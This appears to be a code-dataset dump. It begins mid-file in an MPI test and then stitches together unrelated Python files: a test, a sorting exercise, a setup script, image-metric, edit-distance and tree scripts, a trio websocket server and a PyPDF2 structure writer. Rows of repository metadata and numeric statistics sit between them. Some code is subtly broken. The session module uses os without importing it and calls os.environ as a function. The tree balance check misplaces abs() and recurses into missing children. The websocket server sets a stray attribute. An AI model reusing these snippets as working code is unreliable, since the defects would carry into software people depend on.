x=comm.recv(source, tag1)
print("> test 1: processor ", rank, " got ", x)
# ...
# ...
tag2 = 5678
if rank == source:
x[:] = 0.0
x[1] = 2.0
comm.send(x[1],dest, tag2)
print("> test 2: processor ", rank, " sent ", x[1])
if rank == dest:
x[1]=comm.recv(source, tag2)
print("> test 2: processor ", rank, " got ", x[1])
# ...
# ...
tag3 = 4321
if rank == source:
comm.send(y,dest, tag3)
print("> test 3: processor ", rank, " sent ", y)
if rank == dest:
y=comm.recv(source, tag3)
print("> test 3: processor ", rank, " got ", y)
# ...
# ...
tag4 = 8765
if rank == source:
y[:,:] = 0.0
y[1,1] = 2.0
comm.send(y[1,1],dest, tag4)
print("> test 4: processor ", rank, " sent ", y[1,1])
if rank == dest:
y[1,1]=comm.recv(source, tag4)
print("> test 4: processor ", rank, " got ", y[1,1])
# ...
# ...
tag5 = 6587
if rank == source:
comm.send(y[1,:],dest, tag5)
print("> test 5: processor ", rank, " sent ", y[1,:])
if rank == dest:
y[1,:]=comm.recv(source, tag5)
print("> test 5: processor ", rank, " got ", y[1,:])
# ...
| 22.858824 | 71 | 0.478127 | 265 | 1,943 | 3.464151 | 0.230189 | 0.071895 | 0.065359 | 0.052288 | 0.436819 | 0.368192 | 0 | 0 | 0 | 0 | 0 | 0.067863 | 0.340196 | 1,943 | 84 | 72 | 23.130952 | 0.648206 | 0.097787 | 0 | 0.178571 | 0 | 0 | 0.154112 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e1b2a4e8a21648b7214c1e5fa50745b33f9851 | 1,196 | py | Python | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 2 | 2015-11-08T12:57:16.000Z | 2020-11-19T09:43:14.000Z | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 11 | 2020-01-06T18:55:57.000Z | 2022-03-11T23:27:05.000Z | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 1 | 2019-08-26T06:52:55.000Z | 2019-08-26T06:52:55.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
from warehouse.admin.views import core as views
class TestForbidden:
def test_calls_real(self, monkeypatch):
response = pretend.stub()
forbidden_view = pretend.call_recorder(lambda *a, **kw: response)
monkeypatch.setattr(views, "forbidden_view", forbidden_view)
exc = pretend.stub()
request = pretend.stub()
assert views.forbidden(exc, request) is response
assert forbidden_view.calls == [
pretend.call(exc, request, redirect_to="admin.login"),
]
class TestDashboard:
def test_dashboard(self):
assert views.dashboard(pretend.stub()) == {}
| 31.473684 | 74 | 0.710702 | 159 | 1,196 | 5.289308 | 0.566038 | 0.071344 | 0.030916 | 0.03805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004197 | 0.203177 | 1,196 | 37 | 75 | 32.324324 | 0.878279 | 0.432274 | 0 | 0 | 0 | 0 | 0.037481 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e2ea010aa21fce8b0f2bb0646438f5615e3cee | 637 | py | Python | swexpert/d2/sw_1966.py | ruslanlvivsky/python-algorithm | 2b49bed33cd0e95b8a1e758008191f4392b3f667 | [
"MIT"
] | 3 | 2021-07-18T14:40:24.000Z | 2021-08-14T18:08:13.000Z | swexpert/d2/sw_1966.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | swexpert/d2/sw_1966.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | test_cases = int(input().strip())
def bubble_sort(lst):
nums = lst[:]
swap = True
for i in range(len(nums) - 1, -1, -1):
if not swap:
break
swap = False
for j in range(i):
if nums[j] > nums[j + 1]:
nums[j], nums[j + 1] = nums[j + 1], nums[j]
swap = True
return nums
for t in range(1, test_cases + 1):
n = int(input().strip())
nums = list(map(int, input().strip().split()))
sorted_nums = bubble_sort(nums)
result = ''
for num in sorted_nums:
result += str(num) + ' '
print('#{} {}'.format(t, result))
| 20.548387 | 59 | 0.488226 | 90 | 637 | 3.388889 | 0.388889 | 0.098361 | 0.127869 | 0.098361 | 0.108197 | 0.088525 | 0.088525 | 0 | 0 | 0 | 0 | 0.019185 | 0.345369 | 637 | 30 | 60 | 21.233333 | 0.71223 | 0 | 0 | 0.095238 | 0 | 0 | 0.010989 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0 | 0 | 0.095238 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e63d47bda56a757ae0b4b4f62e29ce5cd1b921 | 1,166 | py | Python | server/setup.py | JayYip/bert-as-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | 1 | 2019-04-20T08:40:24.000Z | 2019-04-20T08:40:24.000Z | server/setup.py | JayYip/bert-multitask-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | null | null | null | server/setup.py | JayYip/bert-multitask-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | null | null | null | from os import path
import codecs
from setuptools import setup, find_packages
with codecs.open('README.md', 'r', 'utf8') as reader:
long_description = reader.read()
with codecs.open('requirements.txt', 'r', 'utf8') as reader:
install_requires = list(map(lambda x: x.strip(), reader.readlines()))
setup(
name='bert_multitask_server',
version='0.1.2',
description='A service to serve bert_multitask_learning models(server)',
url='https://github.com/JayYip/bert-multitask-service',
long_description=long_description,
long_description_content_type='text/markdown',
author='Jay Yip',
author_email='junpang.yip@gmail.com',
license='MIT',
packages=find_packages(),
zip_safe=False,
install_requires=install_requires,
classifiers=(
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
),
scripts=[
'bin/bert-multitask-serving-start',
],
keywords='bert nlp tensorflow machine learning sentence encoding embedding serving',
)
| 31.513514 | 88 | 0.689537 | 138 | 1,166 | 5.702899 | 0.65942 | 0.076239 | 0.035578 | 0.033037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00733 | 0.180961 | 1,166 | 36 | 89 | 32.388889 | 0.816754 | 0 | 0 | 0 | 0 | 0 | 0.412521 | 0.102058 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.096774 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e6fa85535b14df08f37fcbddf1bff0af5b97fd | 1,418 | py | Python | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 20 | 2020-08-24T07:21:30.000Z | 2021-07-09T04:20:06.000Z | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 1 | 2020-10-21T08:02:18.000Z | 2021-01-17T23:29:58.000Z | utils/get_zssr_resutls.py | geopi1/Improved_USRNet | 06395641c30f3df2986cf70f7ceee6c9a5bc0aa9 | [
"MIT"
] | 3 | 2020-11-19T05:17:10.000Z | 2021-05-04T11:01:10.000Z | import matplotlib.pyplot as plt
import os
import numpy as np
import cv2
from skimage.metrics import structural_similarity as ssim
from USRNet.utils import utils_image as util
SMALL_SIZE = 24
MEDIUM_SIZE = 24
BIGGER_SIZE = 24
plt.rc('font', size=SMALL_SIZE) # controls default text sizes
plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title
plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels
plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels
plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize
plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title
res_dir = '/home/george/PycharmProjects/Statistical_im_proc/KernelGAN/results'
gt_dir = '/media/george/storge/USRNet/DIV2K_HR_ds2'
result_list = sorted(os.listdir(res_dir))
psnr_list = list()
ssim_list = list()
for ind,folder in enumerate(result_list):
zssr_im = util.imread_uint(os.path.join(res_dir,folder, f'ZSSR_{folder}.png'))
gt_im = util.imread_uint(os.path.join(gt_dir,f'{folder}.png'))
if gt_im is None or zssr_im is None:
continue
psnr_list.append(cv2.PSNR(gt_im,zssr_im))
ssim_list.append(ssim(gt_im,zssr_im, data_range=gt_im.max()-gt_im.min(), multichannel=True))
print(f'ZSSR PSNR: {np.mean(psnr_list):.2f}')
print(f'ZSSR SSIM: {np.mean(ssim_list):.3f}')
| 35.45 | 96 | 0.74048 | 236 | 1,418 | 4.266949 | 0.402542 | 0.034757 | 0.069513 | 0.084409 | 0.164846 | 0.142999 | 0.142999 | 0.09136 | 0.09136 | 0.09136 | 0 | 0.009812 | 0.137518 | 1,418 | 39 | 97 | 36.358974 | 0.813573 | 0.131171 | 0 | 0 | 0 | 0 | 0.195421 | 0.12592 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e7411f57c3da0a14d3d7adf2d484d11b51d3c9 | 1,955 | py | Python | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | task/session.py | ScottWales/tasks | 7647c1b3cc7ee631029193d8416fd0f20de7a05d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright 2015 ARC Centre of Excellence for Climate Systems Science
author: Scott Wales <scott.wales@unimelb.edu.au>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import yaml
from . import rt
class Session(object):
"""
Holds a task manager session
"""
def __init__(self):
self.servers = {}
def read_config(self, path = None, value = None):
"""
Reads the config file at `path` and sets up servers
The config file is in yaml format, looking like::
---
server1:
kind: rt
url: rt.example.com
user: user
server2:
kind: trac
url: trac.example.com
"""
if value is not None:
config = yaml.safe_load(value)
else:
if path is None:
path = os.path.join(os.environ('HOME'),'.tasks.rc')
with open(path, 'r') as f:
config = yaml.safe_load(f)
for name, c in config.iteritems():
self.add_server(name, url=c['url'], kind=c['kind'], user=c.get('user'))
def add_server(self, name, url, kind, user=None):
"""
Factory function for adding servers
"""
if kind == 'rt':
self.servers[name] = rt.Server(url, user)
elif kind == 'dummy':
self.servers[name] = None
else:
raise NotImplementedError()
| 28.333333 | 83 | 0.59335 | 258 | 1,955 | 4.46124 | 0.523256 | 0.052129 | 0.022589 | 0.027802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007413 | 0.309974 | 1,955 | 68 | 84 | 28.75 | 0.845812 | 0.496675 | 0 | 0.090909 | 0 | 0 | 0.03796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e7e48e445393fa9cddec8e7e757ee1303b32a4 | 5,058 | py | Python | src/okwugbe/metrics.py | edaiofficial/okwugbe | 74233162748a0a583c622e554c08d1d294758f1e | [
"MIT"
] | 5 | 2021-12-22T03:39:16.000Z | 2022-01-14T20:52:16.000Z | src/okwugbe/metrics.py | chrisemezue/okwugbe | e93266fc9d1af1104800efc332f76852d97ddf77 | [
"MIT"
] | 2 | 2021-12-22T23:50:26.000Z | 2021-12-28T03:58:14.000Z | src/okwugbe/metrics.py | chrisemezue/okwugbe | e93266fc9d1af1104800efc332f76852d97ddf77 | [
"MIT"
] | 3 | 2021-12-22T03:39:23.000Z | 2022-02-18T23:21:34.000Z | import numpy as np
class Metrics:
def __init__(self):
super(Metrics, self).__init__()
def _levenshtein_distance(self, ref, hyp):
"""
:param ref: First sequence and or sentence (sequence of words)
:param hyp: Second sequence and or sentence (sequence of words)
:return: the edit distance between both sequences
"""
m = len(ref)
n = len(hyp)
if ref == hyp:
return 0
if m == 0:
return n
if n == 0:
return m
if m < n:
ref, hyp = hyp, ref
m, n = n, m
distance = np.zeros((2, n + 1), dtype=np.int32)
for j in range(0, n + 1):
distance[0][j] = j
for i in range(1, m + 1):
prev_row_idx = (i - 1) % 2
cur_row_idx = i % 2
distance[cur_row_idx][0] = i
for j in range(1, n + 1):
if ref[i - 1] == hyp[j - 1]:
distance[cur_row_idx][j] = distance[prev_row_idx][j - 1]
else:
s_num = distance[prev_row_idx][j - 1] + 1
i_num = distance[cur_row_idx][j - 1] + 1
d_num = distance[prev_row_idx][j] + 1
distance[cur_row_idx][j] = min(s_num, i_num, d_num)
return distance[m % 2][n]
def avg_wer(self, wer_scores, combined_ref_len):
return float(sum(wer_scores)) / float(combined_ref_len)
def word_errors(self, reference, hypothesis, ignore_case=False, delimiter=' '):
"""Compute the levenshtein distance between reference sequence and
hypothesis sequence in word-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param delimiter: Delimiter of input sentences.
:return: Levenshtein distance and word number of reference sentence.
"""
if ignore_case:
reference = reference.lower()
hypothesis = hypothesis.lower()
ref_words = reference.split(delimiter)
hyp_words = hypothesis.split(delimiter)
edit_distance = self._levenshtein_distance(ref_words, hyp_words)
return float(edit_distance), len(ref_words)
def char_errors(self, reference, hypothesis, ignore_case=False, remove_space=False):
"""Compute the levenshtein distance between reference sequence and
hypothesis sequence in char-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param remove_space: Whether remove internal space characters
:return: Levenshtein distance and length of reference sentence.
"""
if ignore_case:
reference = reference.lower()
hypothesis = hypothesis.lower()
join_char = ' '
if remove_space:
join_char = ''
reference = join_char.join(filter(None, reference.split(' ')))
hypothesis = join_char.join(filter(None, hypothesis.split(' ')))
edit_distance = self._levenshtein_distance(reference, hypothesis)
return float(edit_distance), len(reference)
def wer(self, reference, hypothesis, ignore_case=False, delimiter=' '):
"""Calculate word error rate (WER). WER compares reference text and
hypothesis text in word-level.
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param delimiter: Delimiter of input sentences.
:return: Word error rate.
"""
edit_distance, ref_len = self.word_errors(reference, hypothesis, ignore_case,
delimiter)
if ref_len == 0:
raise ValueError("Length of the reference should be > 0.")
wer = float(edit_distance) / ref_len
return wer
def cer(self, reference, hypothesis, ignore_case=False, remove_space=False):
"""Calculate charactor error rate (CER). CER compares reference text and
hypothesis text in char-level. CER is defined as:
:param reference: The reference sentence.
:param hypothesis: The hypothesis sentence.
:param ignore_case: Whether case-sensitive or not.
:param remove_space: Whether remove internal space characters
:return: Character error rate.
:raises ValueError: If the reference length is zero.
"""
edit_distance, ref_len = self.char_errors(reference, hypothesis, ignore_case,
remove_space)
if ref_len == 0:
raise ValueError("Length of reference should be > 0.")
cer = float(edit_distance) / ref_len
return cer
| 39.515625 | 89 | 0.5862 | 590 | 5,058 | 4.872881 | 0.172881 | 0.041739 | 0.014609 | 0.060522 | 0.65113 | 0.546435 | 0.519304 | 0.401043 | 0.378783 | 0.341217 | 0 | 0.009142 | 0.329577 | 5,058 | 127 | 90 | 39.826772 | 0.838691 | 0.316528 | 0 | 0.149254 | 0 | 0 | 0.025379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104478 | false | 0 | 0.014925 | 0.014925 | 0.268657 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e801c7c91230517b18b1bc2bbf692c3cbfea50 | 946 | py | Python | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | Day 1/balance_binary.py | queercat/N-Days-Of-Leetcode | abf32ec9bef5afaeed9e5caa3618e2f09418260e | [
"MIT"
] | null | null | null | class Node():
def __init__(self, value=None, left=None, right=None):
self.value = value
self.left = left
self.right = right
def is_balanced(self):
root = self
height_left = root.left.tree_height()
height_right = root.right.tree_height()
if abs(height_right - height_left > 1):
return False
return True
def tree_height(self):
root = self
if not root:
return root
height = 0
q = [root]
while(True):
size = len(q)
if size < 1:
return height
height += 1
while(size > 0):
node = q.pop(0)
if node.left: q.append(node.left)
if node.right: q.append(node.right)
size -= 1
def __str__(self):
return self.value
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.right.right = Node(6)
root.right.right.right = Node(7)
root.right.right.right.right = Node(8)
print(root.tree_height())
print(root.is_balanced()) | 16.310345 | 55 | 0.651163 | 152 | 946 | 3.934211 | 0.243421 | 0.117057 | 0.070234 | 0.063545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02008 | 0.210359 | 946 | 58 | 56 | 16.310345 | 0.780455 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0 | 0.025 | 0.25 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e8e4534667bb714882b3a04d470fb684fe8e21 | 1,724 | py | Python | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | 4 | 2019-05-27T15:31:24.000Z | 2021-02-17T12:55:58.000Z | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | null | null | null | with-javascript-clients/trio-websocket-server/next-server-example.py | anhinga/2019-python-drafts | d312e4c902f650fb4ad91b9ae7df934ab530a6c6 | [
"MIT"
] | 1 | 2021-02-17T12:56:00.000Z | 2021-02-17T12:56:00.000Z | import trio
from trio_websocket import serve_websocket, ConnectionClosed
import sys
import names
class SetOfNames:
def __init__(self, server_name):
self.server_name = server_name
self.dict_of_names = {}
who_is_who = SetOfNames('Server Ben')
async def echo_server(request):
print("ECHO SERVER")
ws = await request.accept()
while True:
client_name = names.get_full_name()
if client_name not in who_is_who.dict_of_names:
who_is_who.set_of_names = who_is_who.dict_of_names[client_name] = ws
print("KNOWN NAMES: ", set(who_is_who.dict_of_names.keys()))
print("PRESENT NAMES: ", [a for a in list(who_is_who.dict_of_names.keys()) if who_is_who.dict_of_names[a]])
print("NEW CLIENT: ", client_name)
break
await ws.send_message("From " + who_is_who.server_name + ": Your name is " + client_name)
while True:
try:
message = await ws.get_message()
print(message + " (message from " + client_name + ")")
await ws.send_message(message + " (" + who_is_who.server_name + " sending back to " + client_name + ")")
if message == "Stop Server":
for a in list(who_is_who.dict_of_names.keys()):
a_ws = who_is_who.dict_of_names[a]
if a_ws:
await a_ws.send_message("SERVER EXITING (by " + client_name + " request)")
sys.exit()
except ConnectionClosed:
who_is_who.dict_of_names[client_name] = None
break
async def main():
await serve_websocket(echo_server, '127.0.0.1', 8060, ssl_context=None)
trio.run(main)
| 38.311111 | 119 | 0.611369 | 236 | 1,724 | 4.139831 | 0.275424 | 0.061412 | 0.09826 | 0.09826 | 0.282497 | 0.238485 | 0.191402 | 0.126919 | 0.067554 | 0.067554 | 0 | 0.008137 | 0.287123 | 1,724 | 44 | 120 | 39.181818 | 0.786819 | 0 | 0 | 0.105263 | 0 | 0 | 0.095708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.105263 | 0 | 0.157895 | 0.131579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10ec056f054912cb4b0a801c882030b7aec58eb5 | 5,568 | py | Python | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | 1 | 2021-07-19T22:03:13.000Z | 2021-07-19T22:03:13.000Z | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | null | null | null | pypdf2_structures/pdf_obj_struct.py | GRV96/pypdf2_structures | a3dd07bef239d7ba899152ce61e1863dda9779a2 | [
"MIT"
] | null | null | null | """
This module allows to write a PDF object structure in a file stream. An object
structure consists of containers (dictionaries, lists, sets and tuples)
embedded in one another and other objects. This module also works on
structures that do not contain PDF objects.
"""
from PyPDF2.generic import BooleanObject, DictionaryObject, IndirectObject
_DLST = (dict, list, set, tuple)
_LT = (list, tuple)
_PAGE_KEYS = ("/Annots", "/Contents", "/CropBox", "/MediaBox",
"/Parent", "/Resources", "/Rotate", "/Tabs", "/Type")
_STREAM_WRITING_MODES = ("a", "a+", "r+", "w", "w+")
_CLOSING_BRACKET_COLON_SPACE = "]: "
_COLON_SPACE = ": "
_NEW_LINE = "\n"
_OPENING_BRACKET = "["
_PAGE_REF = "\tReference to a page\n"
_SPACE = " "
_TAB = "\t"
_UNEXPLORED_OBJS = "\t[...]\n"
def _index_between_brackets(index):
return _OPENING_BRACKET + str(index) + _CLOSING_BRACKET_COLON_SPACE
def _make_tabs(n):
return _TAB * n
def _obj_and_type_to_str(obj):
if isinstance(obj, BooleanObject):
return str(obj.value) + _SPACE + str(type(obj))
else:
return str(obj) + _SPACE + str(type(obj))
def obj_is_a_dlst(obj):
"""
Indicates whether the given object is a dictionary, a list, a set or a
tuple.
Args:
obj: any object
Returns:
bool: True if the object's type is dict, list, set or tuple, False
otherwise
"""
return isinstance(obj, _DLST)
def _obj_is_a_page(obj):
"""
Indicates whether the given object is a dictionary that represents a page
of a PDF file.
Args:
obj: any object
Returns:
bool: True if the object represents a PDF page, False otherwise.
"""
if isinstance(obj, DictionaryObject):
return tuple(obj.keys()) == _PAGE_KEYS
else:
return False
def _rslv_pdf_ind_object(obj):
if isinstance(obj, IndirectObject):
return obj.getObject()
else:
return obj
def _return_arg(obj):
return obj
def write_pdf_obj_struct(struct, w_stream, write_types=False,
rslv_ind_objs=False, depth_limit=0):
"""
Writes a PDF object structure in a file stream. The indentation indicates
which objects are contained in others. The stream's mode must be "a",
"a+", "r+", "w" or "w+". If argument struct is not a dictionary, a list,
a set or a tuple, this function will only write one line representing that
object.
Args:
struct: any object. Can be a container or not.
w_stream (TextIOWrapper): the file stream that will contain the
structure's representation
write_types (bool): If True, this function will write the contained
objects' type in the stream. Defaults to False.
rslv_ind_objs (bool): If True, the indirect objects found in the
structure will be resolved. Defaults to False. WARNING! Setting
this parameter to True can make the function exceed the maximum
recursion depth.
depth_limit (int): a limit to the recursion depth. If it is set to 0
or less, no limit is enforced. Defaults to 0.
Raises:
RecursionError: if this function exceeds the maximum recursion depth
ValueError: if the stream's mode in incorrect
"""
if w_stream.mode not in _STREAM_WRITING_MODES:
raise ValueError("The stream's mode must be "
+ "\"a\", \"a+\", \"r+\", \"w\" or \"w+\".")
obj_str_fnc = _obj_and_type_to_str if write_types else str
ind_obj_fnc = _rslv_pdf_ind_object if rslv_ind_objs else _return_arg
if obj_is_a_dlst(struct):
w_stream.write(str(type(struct)) + _NEW_LINE)
rec_depth = 1
else:
rec_depth = 0
_write_pdf_obj_struct_rec(struct, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
def _write_pdf_obj_struct_rec(obj_to_write, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc):
tabs = _make_tabs(rec_depth)
rec_depth += 1
if isinstance(obj_to_write, _LT):
length = len(obj_to_write)
for i in range(length):
item = ind_obj_fnc(obj_to_write[i])
line = tabs + _index_between_brackets(i)
if obj_is_a_dlst(item):
line += str(type(item))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(item):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(item, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(item)
w_stream.write(line + _NEW_LINE)
elif isinstance(obj_to_write, dict):
for key, value in obj_to_write.items():
value = ind_obj_fnc(value)
line = tabs + str(key) + _COLON_SPACE
if obj_is_a_dlst(value):
line += str(type(value))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(value):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(value, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(value)
w_stream.write(line + _NEW_LINE)
elif isinstance(obj_to_write, set):
for item in obj_to_write:
item = ind_obj_fnc(item)
line = tabs
if obj_is_a_dlst(item):
line += str(type(item))
w_stream.write(line + _NEW_LINE)
if _obj_is_a_page(item):
line = tabs + _PAGE_REF
w_stream.write(line)
elif depth_limit<=0 or rec_depth<=depth_limit:
_write_pdf_obj_struct_rec(item, w_stream, rec_depth,
depth_limit, obj_str_fnc, ind_obj_fnc)
else:
w_stream.write(tabs + _UNEXPLORED_OBJS)
else:
line += obj_str_fnc(item)
w_stream.write(line + _NEW_LINE)
else:
line = tabs + obj_str_fnc(obj_to_write)
w_stream.write(line + _NEW_LINE)
